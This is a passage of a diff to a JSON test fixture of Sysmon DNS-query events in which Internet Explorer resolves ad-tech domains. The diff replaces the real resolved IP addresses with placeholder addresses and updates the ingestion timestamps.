(x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16435,12 +16255,12 @@ "type": "CNAME" }, { - "data": "23.52.160.7", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.160.7" + "89.160.20.156" ] }, "network": { 
@@ -16457,13 +16277,13 @@ "sync.teads.tv" ], "ip": [ - "23.52.160.7" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742347Z", + "ingested": "2021-12-09T13:50:23.457498200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16527,23 +16347,23 @@ "type": "CNAME" }, { - "data": "3.15.109.176", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.15.225.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.18.121.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.15.101.187", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -16551,7 +16371,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -16559,7 +16379,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -16567,22 +16387,22 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "3.15.109.176",
- "52.15.225.252",
- "3.18.121.79",
- "3.15.101.187",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30"
+ "192.168.80.30"
 ]
 },
 "network": {
@@ -16598,23 +16418,20 @@ "s.thebrighttag.com" ], "ip": [ - "3.15.109.176", - "52.15.225.252", - "3.18.121.79", - "3.15.101.187", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742355400Z", + "ingested": "2021-12-09T13:50:23.457504Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16678,12 +16495,12 @@ "type": "CNAME" }, { - "data": "54.192.55.189", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.192.55.189" + "89.160.20.156" ] }, "network": { 
@@ -16699,13 +16516,13 @@ "t.a3cloud.net" ], "ip": [ - "54.192.55.189" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742407500Z", + "ingested": "2021-12-09T13:50:23.457509900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -16773,12 +16590,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
@@ -16795,13 +16612,13 @@ "tps618.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742417700Z", + "ingested": "2021-12-09T13:50:23.457515800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", 
@@ -16873,52 +16690,52 @@
 "type": "CNAME"
 },
 {
- "data": "54.157.69.185",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "18.209.139.81",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "18.233.36.36",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "52.54.198.81",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "52.55.201.28",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "18.210.34.44",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "52.72.163.149",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "18.232.198.130",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "54.157.69.185",
- "18.209.139.81",
- "18.233.36.36",
- "52.54.198.81",
- "52.55.201.28",
- "18.210.34.44",
- "52.72.163.149",
- "18.232.198.130",
- "192.5.6.30"
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30"
 ]
 },
 "network": {
@@ -16936,21 +16753,14 @@ "dpm.demdex.net" ], "ip": [ - "54.157.69.185", - "18.209.139.81", - "18.233.36.36", - "52.54.198.81", - "52.55.201.28", - "18.210.34.44", - "52.72.163.149", - "18.232.198.130", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742422Z", + "ingested": "2021-12-09T13:50:23.457521700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", 
@@ -17018,39 +16828,39 @@ "type": "CNAME" }, { - "data": "68.67.179.228", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.230", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17058,22 +16868,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "68.67.180.12", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
@@ -17090,23 +16900,16 @@ "secure.adnxs.com" ], "ip": [ - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "68.67.180.12", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742426600Z", + "ingested": "2021-12-09T13:50:23.457527500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 
